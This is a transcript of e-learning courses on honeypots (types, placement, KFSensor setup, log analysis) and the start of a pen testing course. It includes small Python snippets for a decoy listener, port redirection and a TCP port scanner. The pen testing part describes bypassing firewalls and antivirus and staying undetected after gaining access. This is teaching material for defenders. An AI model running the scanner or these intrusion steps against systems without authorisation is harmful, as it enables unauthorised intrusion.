honeypots in overall network security. Next, you will examine honeypot uses
and disadvantages; learn the deployment strategies of a honeypot; and learn the
various open-source and commercial honeypot products available on the market.
Finally, learners will observe how honeypots are placed in a network; how to install
and configure a honeypot by using KFSensor honeypot software; and explore how
honeypot data analysis is captured through automated software or through a manual
method.
Course Overview
[Video description begins] Topic title: Course Overview. Your host for this session
is Ashish Chugh, an IT Consultant. [Video description ends]
Hi, my name is Ashish Chugh, and I have more than 25 years of experience in IT
infrastructure operations, software development, cyber security, and e-learning. In
the past, I've worked in different capacities in the IT industry. I've worked as a quality
assurance team leader, technical specialist, IT operations manager, delivery head
for software development, and cyber security consultant. I have a bachelor's degree
in psychology and a diploma in system management.
My expertise is in IT operations and process management. Other than this, I have
various certifications which are Certified Network Defender, Certified Ethical
Hacker, Computer Hacking Forensic Investigator. And there are various
certifications from Microsoft, which are MCSC, MCAC, and MCP. I'm also a certified
Lotus professional. In this course, you will learn about the fundamentals of
honeypots. You will understand the role of honeypots in security. You will also
learn about different types of honeypots, and different types of honeypot
architectures. This course will also cover the weaknesses of a honeypot.
Honeypot Introduction
[Video description begins] Topic title: Honeypot Introduction. The presenter is
Ashish Chugh. [Video description ends]
A honeypot is a system that simulates a real system.
[Video description begins] Honeypot. [Video description ends]
It is configured with several vulnerabilities. It is a system that is configured to
detect, deflect, or counteract any unauthorized attempt to gain access to
information. The real reason why honeypots are put into place is that they
do not have any real data; they do not have any kind of critical information stored.
They just simulate a real system so that the attacker is attracted to this system
and comes and attacks it. Therefore, you will be able to capture a lot of information
about how the hacker attacked, what kind of movements the hacker made, and what
strategy the hacker used to attack this system.
Remember that a honeypot does not contain any production or real data. It is just a
simulation of a real system, so there is no legitimate traffic sent to or received
from the honeypot. This means that a honeypot is designed to sit idle, and if there
is any activity on the honeypot, it should give you a reason to be suspicious. Its
main intent is to attract a hacker. You need to monitor the honeypot on a continuous
basis so that if any attack occurs, you are able to capture that information
and act in real time. A honeypot sitting idle has no use. It can only be
useful once it is compromised. It will then give you enough data, through the log
files, that you can examine.
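To make the idea concrete, here is a minimal sketch of a low-interaction listener in Python: it accepts connections on a single port and logs the source address, time, and first bytes received, on the principle that any traffic reaching a honeypot is suspicious. The port number is an assumption for illustration; real products such as KFSensor or Honeyd do far more than this.

```python
# Minimal sketch of a low-interaction honeypot listener.
# It serves no real data; it only records who connected, when, and what they sent.
import socket
from datetime import datetime

LISTEN_PORT = 2323          # assumed decoy port for illustration (e.g. pretending to be telnet)

def run_listener(port: int = LISTEN_PORT) -> None:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", port))
        srv.listen()
        print(f"Honeypot listening on port {port}; any connection is suspicious.")
        while True:
            conn, (src_ip, src_port) = srv.accept()
            with conn:
                conn.settimeout(2.0)
                try:
                    data = conn.recv(1024)
                except socket.timeout:
                    data = b""
                # Log the event; in practice this would go to a protected log store.
                print(f"{datetime.utcnow().isoformat()} connection from {src_ip}:{src_port} "
                      f"sent {data[:60]!r}")

if __name__ == "__main__":
    run_listener()
```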
Types of Honeypots
[Video description begins] Topic title: Types of Honeypots. The presenter is Ashish
Chugh. [Video description ends]
Honeypots are primarily classified in three ways: by interaction level, by
implementation type, and by purpose. In the next few slides, we'll be looking at each
one of them.
[Video description begins] Interaction Level - Low. [Video description ends]
Within the interaction-level classification, there are two types: low and high. Let's
look at low interaction level honeypots first. This is the type of honeypot that uses
limited system resources. Such a honeypot also has limited interaction with
external systems. It does not involve any kind of operating system and only runs a
limited set of services that can be used to attract the hacker. It gathers a minimal
amount of data: since there is only a limited number of services running, it can
gather only a limited amount of data. It also carries minimal risk, as there is no
operating system involved.
Remember, when there is an operating system involved, there is a high chance
that the entire system can be exploited. But since there is no operating system
involved, there is very little chance of full exploitation of the system. It exposes
services that cannot be exploited to gain complete access to the system,
because there is only a small set of services, and these services are such that they
cannot be exploited, but they are good enough to attract the hacker. It limits the
attacker to the level of emulation provided by the honeypot: the attacker can only
work with the services that are provided on the honeypot and, beyond that, does not
have any kind of access. Examples of such honeypots are HoneyBOT,
Honeyd, and KFSensor.
[Video description begins] Interaction Level - High. [Video description ends]
Let's now look at high interaction level honeypots. Unlike low interaction honeypots,
high interaction honeypots involve a real operating system
and real applications. They can be exploited in full capacity by the hacker: because
there is an operating system involved and there are real applications involved,
the system can be exploited. They are also complex in nature. Whereas low
interaction level honeypots are pretty easy to deploy, where you just have to install
the application and give access to a few services,
high interaction honeypots are complex in nature and difficult to
deploy. They provide a real system, with an operating system and applications, to the
hacker. The hacker here cannot tell whether it is a honeypot or a real
system, because this type of honeypot has a real operating system, a real set of
applications, and some data to confuse the hacker. One of the
big problems with this kind of honeypot is that it can be compromised in full
capacity and, therefore, it allows the hacker to launch attacks on the other systems
as well. Some examples are Symantec Decoy Server, HoneyWall, and
Specter.
[Video description begins] Implementation Type. [Video description ends]
Now, let's look at implementation type. There are primarily two types: physical and
virtual. Physical systems are real systems. These are the servers you will deploy the
honeypot on: you take a physical server and deploy a honeypot
application on top of it. These have their own IP addresses; each server
is assigned a specific IP address. They are difficult to deploy and maintain. This is
because each physical server not only takes up physical space in the data
center, it also requires electricity, and it requires manpower to maintain.
And one physical server can run only one operating system; even though you can
dual boot, you can only run one operating system at a time. They are also
more expensive, not only in terms of maintenance but also the purchase of the
server and the application, and then you need the manpower to
maintain them.
On the other hand, if you look at virtual honeypots, they are also deployed on a
physical system, but in the form of a virtual machine. This means that on
one single physical system you can have, say, ten virtual machines running, depending
on the capacity of the physical server. They are easy to deploy and
maintain. You can always move a virtual machine around, so if one server runs
out of capacity, you can take that virtual machine and deploy it on another system
or server. And it is pretty obvious that each virtual machine can run a
different type of operating system. So for instance, you can deploy a honeypot on
Windows, take another honeypot, which runs only on Linux,
and run them in parallel on a single server.
[Video description begins] Purpose-specific. [Video description ends]
Now let's look at purpose-specific honeypots. You have two types: production and
research. Production honeypots capture limited information. They're easy to
deploy. They use a specific method, which is the prevention, detection, and response
method. These are usually used in organizations and are deployed to protect the
network. On the other hand, if you look at research honeypots, they are
deployed to learn new methods and gather intelligence on the threats and the types of
tools that have been used in an attack. Such honeypots are designed to track an
attacker's progress and the methodology used in the attack.
Research honeypots are complex to build and complex to deploy. They're
also used not by ordinary organizations as such, but mainly by universities,
governments, and the military. And the data they gather has no direct value to the
organization. Basically, what this means is that the type of data research honeypots
gather does not provide value to the organization in the sense that it cannot
help them protect their own network. Rather, this type of data is more useful for
universities, militaries, or research-type organizations, so they can study the
attack methods.
Role of Honeypots in Security
[Video description begins] Topic title: Role of Honeypots in Security. The presenter
is Ashish Chugh. [Video description ends]
Role of a honeypot in security. Remember, a honeypot is not a real system, and it is
not meant to be interacting with any system on the network. Therefore, it does not
expect any data from any device or any user. If there is any interaction with the
honeypot by any device or user, you can be very sure that this is
malicious traffic being targeted towards the honeypot. It does not send or
receive any traffic; it does not interact with the systems or any user on the network.
Therefore, any traffic towards a honeypot, or leaving the honeypot, is considered
to be suspicious. A honeypot is not designed to solve any kind of security problem,
but it is considered to be an add-on to network security. If you think about it,
you have enough devices that can provide security on the network. For instance,
you have a firewall, you have intrusion prevention systems, you have intrusion
detection systems, and there are various other security devices, such as data leak
prevention. All these devices are doing their jobs.
Now, the role a honeypot plays in security is that it sits on the network, or outside
the network, and it attracts a hacker to come and exploit it. The reason that is
done is so that the attacker can come in, do various things, and you are able to
collect a lot of information about that particular attack. In order for that to happen,
you have to keep the honeypot out there in the open, or place it in such a way that it
can collect this kind of information. A honeypot will not necessarily generate a high
amount of data. It will gather a small amount of data; for instance, it might just
capture the attack information on a particular port, let's say port 80. It will give you
that kind of data. Now, based on that data, you can create some value out of it by
studying it, analyzing it, and understanding what attack has happened and where it has
happened. It can also be used to capture new tools and techniques that have
not been used earlier.
A lot of hackers come out with new custom tools. When they attack a particular
system on the Internet, they use these tools and exploit it. Most of these tools
have not been seen before because they are customized, developed by the
hackers themselves. So the honeypot can capture that kind of information and their
methodology, and you can figure out what has happened on the honeypot
and understand it later on by studying the data that has been captured.
Disadvantages of a Honeypot
[Video description begins] Topic title: Disadvantage of a Honeypot. The presenter
is Ashish Chugh. [Video description ends]
Disadvantages of a honeypot. Along with the advantages, there are several
disadvantages of a honeypot. It can be fingerprinted to determine whether it is a
real system or a honeypot. This problem typically happens if you put up a low
interaction honeypot. Remember, in the previous slides we learned that a low
interaction honeypot runs only a few services. An experienced hacker can easily
figure out whether it's a real system or a honeypot: because the hacker is not able
to interact beyond a certain set of services, it is easy for the hacker to work
out that it's a honeypot. It can also lead to the compromise of other systems on the
network. This problem typically happens with a high interaction honeypot, because a
high interaction honeypot runs an operating system, runs real applications, has some
amount of data, and is connected to the network.
If the operating system or the applications are compromised, the hacker can
actually get onto the network and compromise the other systems that are there.
Therefore, this is one of the main disadvantages of high interaction honeypots. A
honeypot is only able to detect the attacks that are directed at it. If no attacks are
directed at it, it cannot detect or prevent anything. Another issue that might happen
is that if the hacker identifies that a system is a honeypot, he or she can easily
bypass it and attack the real systems. Honeypots can also be difficult to build,
configure, and deploy. This is a typical problem with high interaction honeypots; on
the contrary, low interaction honeypots are easy to deploy. A honeypot can also be used
as a bot to attack other systems on the network. If this is a high interaction honeypot
and it has been compromised, a hacker can actually use this particular system as a
bot or zombie to attack other systems on the Internet. This kind of participation
is usually involved in distributed denial of service attacks.
Honeypot Uses
[Video description begins] Topic title: Honeypot Uses. The presenter is Ashish
Chugh. [Video description ends]
Uses of a honeypot. Honeypots help you detect the hackers' activities and their
methodology. With the help of data that you have collected, you can gain insight
into future attacks that may occur.
[Video description begins] Honeypots lure attackers. They capture attacks and
provide information about them. [Video description ends]
Because if a hacker has used a specific methodology to attack the honeypot, there
is a high chance the hacker will return and use the same methodology. Therefore, it
is very useful for you to gather such information and study it carefully. A honeypot
is designed to capture incoming malicious traffic. Remember, a honeypot is not
supposed to be interacting with any system on the network or on the Internet, so
any incoming traffic is considered to be malicious. You have to capture this traffic,
understand what the hacker is doing, and study the logs.
A honeypot also reduces the burden of purchasing new software or hardware to
strengthen your network. Normally, an organization would purchase new hardware or
software to prevent an attack from a hacker, which can otherwise be achieved by doing
packet analysis and understanding what is happening on the network. A honeypot can do
the same job at bare minimum cost; in fact, there are a lot of open-source honeypots
available that can be deployed and used.
Honeypot Deployment Strategies
[Video description begins] Topic title: Honeypot Deployment Strategies. The
presenter is Ashish Chugh. [Video description ends]
Honeypot deployment strategy. You should install honeypots alongside the
production servers. The reason for this is that the honeypot will likely need to mirror
some real data and services from the production server. This is required so that
attackers can be confused about whether it is a real system or a honeypot. The
security of a honeypot can be loosened slightly, so that there is a high chance of it
being compromised. You can also double up each server with a honeypot to
redirect suspicious traffic. For instance, legitimate traffic at TCP port 80 can be sent
to the web server, whereas the remaining traffic aimed at the web server
can be directed towards a honeypot. To be able to use this strategy, you need to
replicate some of the data, such as website content, on the honeypot.
You should also build a honeynet rather than using a single honeypot server. For an
experienced hacker, it is easy to figure out whether it's a honeypot or a real system.
But if you have a honeynet, which is a collection of multiple honeypots, it can
confuse a hacker as to whether it's a real network or a simulated network. You can
also have different types of applications running on different
types of honeypots. For instance, it could be a honeypot running on a Linux server,
or it could be a honeypot running on a Windows server. This will help you gather a lot
of information if any of the honeypots comes under attack. Another strategy you
can use is to put up a sacrificial lamb, which has nothing to do but wait to
be attacked. This strategy is based on the lion and the lamb story:
when hunters went into the jungle, they needed something to attract the
lion. The same idea is used in honeypots. You put up a simulated system
and you wait for it to be attacked; but if it is not
attacked, you can't really do anything about it. You can also use port redirection
and reroute the traffic from one port to another port on the honeypot. You can also
use the minefield strategy, where honeypots are monitored regularly and
continuously by an intrusion detection system or a vulnerability scanner.
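The port redirection strategy mentioned above can be sketched with a simple TCP forwarder: connections arriving on one port are logged and then relayed to a port on the honeypot. The port numbers and honeypot address here are assumptions for illustration; in production this job is usually done by a firewall or load balancer rule rather than a script.

```python
# Minimal sketch of port redirection: accept traffic on one port, log it,
# and relay it to a honeypot port. Addresses and ports are illustrative assumptions.
import socket
import threading

LISTEN_PORT = 8080              # port exposed to the attacker (assumed)
HONEYPOT = ("127.0.0.1", 2323)  # honeypot address and port (assumed)

def pipe(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes from src to dst until the connection closes."""
    try:
        while data := src.recv(4096):
            dst.sendall(data)
    except OSError:
        pass
    finally:
        dst.close()

def handle(client: socket.socket, addr) -> None:
    # Record the redirection, then relay traffic in both directions.
    print(f"Redirecting {addr[0]}:{addr[1]} -> honeypot {HONEYPOT[0]}:{HONEYPOT[1]}")
    upstream = socket.create_connection(HONEYPOT)
    threading.Thread(target=pipe, args=(client, upstream), daemon=True).start()
    threading.Thread(target=pipe, args=(upstream, client), daemon=True).start()

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", LISTEN_PORT))
    srv.listen()
    while True:
        handle(*srv.accept())
```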
Available Honeypot Products
[Video description begins] Topic title: Available Honeypot Products. The presenter
is Ashish Chugh. [Video description ends]
Low-interaction honeypot products. Even though there are a lot of products available
as low-interaction honeypots, the three primary ones are Honeyd,
KFSensor, and HoneyBOT.
[Video description begins] High Interaction Honeypot Products. [Video description
ends]
There are also several products available as high-interaction honeypots. These are
Specter, Symantec Decoy Server, and HoneyWall.
Placement of Honeypot in a Network
[Video description begins] Topic title: Placement of Honeypot in a Network. The
presenter is Ashish Chugh. [Video description ends]
A honeypot can be placed internal or external to a network. It can also be
placed in a DMZ. Let's look at each one of them in detail in the next few slides.
[Video description begins] External Honeypot. [Video description ends]
External honeypots have no firewall protection; they are basically hosted on the
Internet. They use a public IP from the production network. They can also be
monitored by a management system. So for instance, you have a specific
management and monitoring system that is placed specifically to monitor
the honeypot. An external honeypot is likely to attract more hackers, as it is in the
public domain. Remember, this is a system that has a lot of security loopholes. It is
placed on the Internet and does not have any kind of protection; for example, there is
no firewall protection available for this honeypot, so it is likely to attract more
hackers. It has high Internet exposure.
Again, it is using a public IP and does not have firewall protection, therefore the
exposure on the Internet is extremely high. It's easy to set up: all you need to do is
assign a public IP address, put it on the production network, and let it face the
Internet. It requires a low number of network devices. There is no special
configuration required, and there are no special network devices required for this
particular honeypot. And it provides poor data control, because even though it
simulates some amount of data, there is no real control that you have over this
particular system. It can also be a risk to the production network.
Remember, this is placed on a production network but it is public facing, it is
Internet facing. So what happens is, when it is attacked, there is a high chance that
the hacker will not only compromise the honeypot, but will also have the
liberty of compromising the other systems on the production network. Now let's
look at the diagram of an external honeypot. As I said earlier, there is no firewall
protection on this particular honeypot. You have the Internet, a router, and then a
switch or hub that connects the honeypot and the production network.
And then there is a monitoring system, which is placed specifically to monitor the
honeypot.
[Video description begins] Internal Honeypot. [Video description ends]
Let's now look at internal honeypots. They are used to detect attacks that have passed
through the firewall. So there is firewall protection, but if a certain type of
traffic has passed through the firewall, the honeypot should be able to capture that
traffic if it is redirected towards it. This can lead to the compromise of internal
systems, because the honeypot is placed on the production
network; it is internal, but it is protected by the firewall. If the honeypot is
compromised, there is a good chance that the hacker will be able to compromise
the other systems on the production network.
The main difference between an external honeypot and an internal honeypot is that the
internal honeypot does not have a public IP address and is protected by a firewall.
Because there are multiple layers of security devices involved, such as a
firewall and an intrusion detection system, it is complex to deploy, but it also
works as an early warning system. So if this system gets compromised, the intrusion
detection system should be able to give you a warning stating that the honeypot has
been compromised. And it is more complex to deploy because, with
multiple security devices involved, you have to configure the intrusion
detection system to monitor honeypot traffic and you have to have a firewall
protecting the internal network. The architecture becomes quite
complex. Let's now look at how an internal honeypot is deployed.
[Video description begins] A diagram displays Internet, which is connected
through the Router. The router is connected to the Firewall. The Honeypot and
Intrusion Detection System are connected to the Switch/Hub. It also includes the
Monitoring System and Production System that are part of the Production
Network. [Video description ends]
In this graphic, if you look at it, the internal honeypot is protected by a firewall and
is located on the internal network. It is also being monitored by the intrusion
detection system, and there is a monitoring system watching the
honeypot as well.
[Video description begins] DMZ Honeypot. [Video description ends]
Let's now look at the DMZ honeypot. A DMZ honeypot is placed in the DMZ, along with
the other servers. It uses the same IP range that has been assigned to
the other servers in the DMZ. It helps you provide good data control. And it is the
most complex to deploy as compared to internal and external honeypots. This is
because you have to be very sure how you're placing this honeypot in the DMZ.
The DMZ has limited exposure to the internal network but more exposure to
the external network. Therefore, there is less chance that the internal network
will get compromised. But if the honeypot gets compromised, it can be a danger to
the other servers in the DMZ. Let's now look at the DMZ honeypot architecture.
There is the Internet, to which your organization connects through a router. Then there
is a firewall, which filters incoming and outgoing traffic. The firewall is also
connected to another router, which is configured for the DMZ. And then you have
the DMZ production servers and the honeypot, which are connected together.
[Video description begins] The Production DMZ and Honeypot are connected to
the Switch/Hub. [Video description ends]
This honeypot is part of the production DMZ, and there is an intrusion detection
system which is monitoring the traffic of the honeypot. And then there is a
monitoring system which is also monitoring the honeypot. So this was the DMZ
honeypot architecture.
Install and Configure a Honeypot
[Video description begins] Topic title: Install and Configure a Honeypot. The
presenter is Ashish Chugh. [Video description ends]
In this demo we will install KFSensor, which is a honeypot application. Now,
the honeypot application KFSensor can work with or without packet capturing
technology. If you need the packet capturing feature to be enabled, then you need to
install either WinPcap or Npcap. However, KFSensor always prefers to use Npcap
over WinPcap because of its updated code base. So let's first install Npcap, post
which we will install KFSensor.
[Video description begins] The File Explorer window opens. The window is divided
into three parts. The first part is the menu bar. The second part is the navigation
pane. The Downloads folder is selected. The third part is the content pane. It
contains files called: npcap-0.9983 and kfsense40. [Video description ends]
In the User Account Control dialog box, click Yes to proceed. [Video description
begins] He double clicks the npcap-0.9983 file. [Video description ends] The
Npcap Setup Wizard is now displayed. On the license agreement page, click I
Agree. [Video description begins] A wizard called: Npcap 0.9983 Setup opens. A
page called: License Agreement is open in the wizard. [Video description ends]
On the installation options page, click Install. The installing page is displayed, this
will show the installation progress of Npcap. If you want to see the detail of Npcap,
then you can just click on the Show details button. The installation takes a few
minutes. Post this installation, we will proceed with the installation of KFSensor.
After the installation is completed, click Next. On the finished page, click
Finish. [Video description begins] The File Explorer window opens. [Video
description ends]
Now, we have installed Npcap, which is a packet capturing application. Double-click on the kfsense40 executable. The Windows Installer dialog box is displayed now.
So it's preparing to install the application. KFSensor Evaluation Setup Wizard is
displayed on the Welcome page, click Next. [Video description begins] A wizard
called: KFSensor Evaluation Setup opens. A page called: Welcome to the
KFSensor Evaluation Setup Wizard is open in the wizard. [Video description ends]
On the End-User License Agreement page, click I accept the terms in the License
Agreement, click Next. On the Destination Folder page, keep the default
installation path, and click Next. On the Ready to install KFSensor Evaluation,
click Install. It's a pretty straightforward installation, there are no complications in
the installation, as it is GUI based. Once it is installed, then we'll be able to use
KFSensor. So User Account Control dialog box is displayed, click Yes.
Now the installation progress is displayed. The installation doesn't take much time,
it's only a few minutes job. Once it is installed, we'll be able to use the application.
Notice that it's now showing Starting services, the installation is done. It's now
starting the services. Keep Launch KFSensor option selected. [Video description
begins] A page called: Completed the KFSensor Evaluation Setup Wizard
opens. [Video description ends]
On the completed page, click Finish. You're done with the installation of KFSensor,
which is a honeypot application. Okay, so it's not able to locate WinPcap. [Video
description begins] A message box called: KFSensor - Warning opens. A message,
“WinPCap installation not located. Network protocol analyzer functionality
disabled.” is displayed. [Video description ends]
So, network protocol analyzer functionality will now be disabled, which is okay.
For this demo, we don't really need it. [Video description begins] He clicks the OK
button. The message box closes. [Video description ends]
So notice that there is some bit of traffic on different ports, which is fine, this
traffic is okay. [Video description begins] A window called: KFSensor Professional
- Evaluation Trial opens. It is divided into four parts. The first part is the menu bar.
The second part is the toolbar. The third part is the navigation pane. A folder
called: kfsensor - localhost - Main Scenario is selected. It further includes folders
called: TCP and UDP. The fourth part is the content pane. The content pane
displays the information for the folder selected in the navigation pane. [Video
description ends]
There's nothing to worry about. Just remember one thing, honeypot is not designed
to send or receive traffic. So if there is any traffic that is directed towards the
honeypot, you should analyze that traffic. So this is now configured. This is my
host system on which this virtual machine has been set up. [Video description
begins] He selects a file called: 138 NIIT Datagram Service - Recent Activity in the
UDP folder. [Video description ends]
So this is fine, this is the VMware applications DHCP server, so there is no
suspicion on this traffic. [Video description begins] He selects a file called: 67
DHCP - Recent Activity in the UDP folder. [Video description ends] So let's see if
there is some traffic that we can generate by pulling up the default homepage. So
what I've done is, from my host system, I've connected to the IIS website running on
port 3128. [Video description begins] He opens the Internet Explorer window. He
selects the address: 127.0.0.1:3128/ in the URL text box. He switches to the
KFSensor Professional - Evaluation Trial window. [Video description ends]
Notice that it's already started to pick up the alarms that somebody is already
connected. So this is a typical role that a honeypot plays. [Video description
begins] He selects a file called: 3128 IIS Proxy - Recent Activity in the TCP folder.
Its information is displayed in the content pane in a tabular format. [Video
description ends] If anybody tries to connect to any of the ports that are
available on this honeypot, it's going to capture that traffic. Now, the benefit of this
is that you can find out who the visitor is and what type of request is being
received. This is what needs to be analyzed. So that's it for this demo.
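As an aside, if you prefer to generate the test traffic from a script instead of a browser, a short snippet like the following does the same thing the demo did: it opens a connection to the port the honeypot is emulating and sends a simple HTTP request so the visit shows up as an event. The address and port mirror the demo setup and are assumptions about your own environment.

```python
# Minimal sketch: generate test traffic toward a honeypot port so its logging can be verified.
# The address/port mirror the demo (emulated IIS proxy on 3128) and are assumptions.
import socket

HONEYPOT = ("127.0.0.1", 3128)

with socket.create_connection(HONEYPOT, timeout=3) as s:
    s.sendall(b"GET / HTTP/1.1\r\nHost: honeypot-test\r\n\r\n")
    try:
        reply = s.recv(1024)          # the emulated service may or may not answer
    except socket.timeout:
        reply = b""

print(f"Sent test request to {HONEYPOT[0]}:{HONEYPOT[1]}; received {len(reply)} bytes back.")
print("Check the honeypot console - the visit should now appear as an event.")
```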
Honeypot Data Analysis
[Video description begins] Topic title: Honeypot Data Analysis. The presenter is
Ashish Chugh. [Video description ends]
Honeypot data analysis. Honeypot data can be captured either using automated software or through a manual method. Both methods have their own pros and cons. Automated software will help you capture data in a more sophisticated manner, which can be analyzed later on. Most such applications will also help you do the analysis on their own. The manual method is a little more complex: you have to capture the data and analyze it yourself. You also have to capture the data from the initial compromise. This is where you determine how the hacker got into the system. Was it a port that was open and the hacker got in, or was it an application that was exploited? You would also want to log all the actions after the initial compromise.
So the initial compromise is just the starting stage. The more crucial data comes later, where you log the hacker's actions after the initial compromise. You want to see what the hacker has done and what methodology the hacker used to compromise the system. To be able to collect useful data, you should log all of the hacker's activities, down to the smallest action performed on the system. You should also collect information at many TCP/IP layers, because at each layer a different type of attack can happen. So capture all of that information and collect as much as possible. You do not want to leave out even a minute detail, because it could be crucial to understanding how the attack happened.
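To make the automated capture idea concrete, here is a minimal sketch of a low-interaction listener in Python. It is not KFSensor; it simply accepts connections on one decoy port and logs the source IP address, source port, timestamp, and the first bytes the visitor sends, which is exactly the kind of data discussed next. The port number and log file name are arbitrary choices for the example.

    import datetime
    import socket

    def listen_and_log(port, logfile="honeypot.log"):
        """Minimal low-interaction listener: log every connection attempt on one decoy port."""
        srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", port))
        srv.listen(5)
        while True:
            conn, (ip, src_port) = srv.accept()
            stamp = datetime.datetime.now().isoformat()
            data = b""
            try:
                conn.settimeout(2)
                data = conn.recv(1024)  # capture whatever the visitor sends first
            except socket.timeout:
                pass
            finally:
                conn.close()
            with open(logfile, "a") as f:
                f.write(f"{stamp} {ip}:{src_port} {data!r}\n")

    listen_and_log(2121)  # hypothetical decoy port; a real honeypot would watch many ports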
[Video description begins] Types of Data Collected. [Video description ends]
Let's now see the kind of data that you can collect. You can collect the source IP address from which the hacker attacked the system. You can also check the source port number, the port that was used to connect to the honeypot. Then there are the commands issued during the attack: what type of commands did the hacker issue? Maybe it was to extract data, maybe to exploit a vulnerability, maybe to gain access to other systems. What type of user credentials were used by the hacker? This is critical, because a hacker may exploit existing user credentials on the system and then gain privileges. You also want to see what time the attack occurred. Is the honeypot being attacked at a certain time, or is there a random timeline being used? This is a screenshot of KFSensor.
[Video description begins] A window called: KFSensor Professional – Evaluation
Trial is displayed. It is divided into four parts. The first part is the menu bar. The
second part is the toolbar. The third part is the navigation pane. It includes folders
called: TCP and UDP. The fourth part is the content pane. In the content pane data
is displayed in a tabular format. It contains eight columns and several rows. The
column headers include: ID, Start, Duration, Visitor, and Description. [Video
description ends]
Now, this particular screenshot shows an attack that occurred on port 80, which was running the Internet Information Services web server on Microsoft Windows. There are certain attacks happening at repeated intervals, so they are being logged. Now, going back to the very first slide where we said a honeypot is not a real system: it does not expect any kind of incoming or outgoing traffic. Therefore, if there is incoming traffic taking place on port 80, this means that it is malicious traffic.
Course Summary
[Video description begins] Topic title: Course Summary. The presenter is Ashish
Chugh. [Video description ends]
So in this course, our goal was to identify the importance of a honeypot and learn how it plays a key role in network security. We did this by covering the role of a honeypot for security, the different types of honeypots, design topics for honeypots, the weaknesses of a honeypot, and how a honeypot fits into a larger security strategy. In our next course, we will move on to explore penetration testing, how it fits into a security program, and the various tools used in penetration testing.
Information Security: Pen Testing
Explore the key penetration (pen) testing concepts such as vulnerability assessment,
types of pen testing, and threat actors, in this 14-video course. Discover why pen
testing is needed and investigate tools used for pen testing. Key concepts covered
in this course include pen testing, a set of tasks that are performed by ethical
hackers against an organization, but in a legal way; steps performed during the pen
testing process; and reasons why an organization needs to perform pen testing and
distinguish between pen testing and vulnerability assessments. Next, you will
compare the different types of pen testing and learn the weaknesses of pen testing;
learn the various types of tools used in pen testing and the target selection for pen
testing; and learn the types of assets in an organization; compare the types of risk
responses that an organization may adopt. Finally, learners observe how to use the
Metasploit framework in Kali Linux; and how to create an exploit by using
MSFvenom.
Course Overview
[Video description begins] Topic title: Course Overview. [Video description ends]
Hello, my name is Ashish Chugh.
[Video description begins] Your host for this session is Ashish Chugh. He is an IT
consultant. [Video description ends]
I've been working in the IT industry for more than 25 years. I worked across
various domains such as IT infrastructure operations, software development,
cybersecurity, and e-learning. I've been working in the cybersecurity domain for
about five years and have various certifications in the same domain. These
certifications are Certified Ethical Hacker, Computer Hacking Forensic
Investigator, and Certified Network Defender from EC-Council. The other
certifications that I have are ITIL, MCSE, MCSA, MCPS, MCP, and CLP.
In this course, we will understand the need for pen testing and how it fits into a security program. We will also understand the pen testing mindset and how it affects your approach to security. Going forward in the course, we will also be
familiarized with different levels of penetration testing. And we'll also understand
some of the weaknesses around penetration testing. Finally, when we move towards
the end of the course, we will also understand the types of tools that are used for
penetration testing.
Pen Testing Process Introduction
[Video description begins] Topic title: Pen Testing Process Introduction. Your host
for this session is Ashish Chugh. [Video description ends]
Let's first define what penetration testing is. Penetration testing is a set of tasks performed against an organization by ethical hackers, people who are experts in hacking, but in a legal way, which means the ethical hackers are either contracted or hired by the organization to penetrate its own network.
Let's move ahead and define penetration testing. Penetration testing is also known
as pen testing. In most cases, you would hear people talking about pen testing. And
some people would simply refer to it as penetration testing. So what does it do? It is
a simulated attack in which the ethical hackers or penetration testers would exploit
the vulnerabilities that may exist within a system, server, or the network. It could
also be an application. Before they exploit a vulnerability, they have to first find the
vulnerability and then exploit it.
Why would an organization want to penetrate its own network? The intent is to find the vulnerabilities before a hacker does. What we have to understand is that no application, no web application, no server or system is secure enough. There can never be enough security. There will always be one vulnerability or another in any of these. So what the organization wants is for somebody to find and exploit the vulnerabilities before a hacker does.
In order for you to be able to do that, you have to start thinking like a hacker. You
cannot think like a system admin or IT security professional who works for the
organization and find vulnerabilities and exploit them. You have to wear the
hacker's thinking hat and find the vulnerabilities, as many as you can, and then
exploit them.
Penetration testing is a series of tasks that need to be performed, and they have to
be performed in a particular sequence. For instance, you would start with
reconnaissance, which means you will try to understand what the network is like,
you would find out basic details about the infrastructure or the server or the
network of an organization.
Beyond that, you would perform a bit of network discovery, in which you would probably want to find the open ports within the network or on a particular server. Then you perform a vulnerability scan. You want to find those vulnerabilities that have not been patched as of now. Once you have found the vulnerabilities, there could be one or there could be many.
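As a minimal sketch of the network discovery step, the following Python snippet tries a TCP connection to a handful of well-known ports and reports which ones accept it. This is a very simplified version of what a scanner such as Nmap does; the target address is a hypothetical lab host, and you should only run this against systems you are authorized to test.

    import socket

    def scan_ports(host, ports, timeout=0.5):
        """Return the TCP ports on host that accept a connection."""
        open_ports = []
        for port in ports:
            try:
                with socket.create_connection((host, port), timeout=timeout):
                    open_ports.append(port)
            except OSError:
                pass  # closed, filtered, or unreachable
        return open_ports

    # Hypothetical lab target and a few well-known ports.
    print(scan_ports("192.0.2.10", [21, 22, 23, 80, 443, 3389]))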
Then you would use exploits to break these vulnerabilities and break the security
controls that have been implemented. Now why are we saying, break the security
controls? Let's assume a system, which is a critical server on the network, has not been patched properly and there are several vulnerabilities that exist. Now the server also runs a firewall. It also runs an antivirus system. So how would you get into this server by breaking the security controls? The answer is simple: you would bypass the firewall. You would also bypass the antivirus application
that is installed on the server. Now most of these exploits are pretty smartly
designed and then they can bypass such security controls, after which you would do
manual probing and conduct the attack. So manual probing means you will dig
more into the server and then finally complete your attack.
Let's now understand the penetration testing process. So there is a sequence of steps that you have to follow to be able to complete the penetration testing process successfully. You start with planning, which means you first plan your
penetration testing. You do the basic planning of it, you understand what you have
to do. And this could involve something like getting the contract from the client or
understanding what needs to be done with a particular server or a network or a web
application.
Once that part is done, then you move into the reconnaissance phase and you
basically understand what the application or the server is all about. Then you do the
scanning part of it, in which you scan the server or the network or the web
application trying to find the vulnerabilities. Then you exploit them. Finally, you
gain access. Once you gain access, then you move to the next phase.
The next phase is maintaining access. So you have to basically lie low and remain
undetected for as long as possible. That is how you maintain access within a system
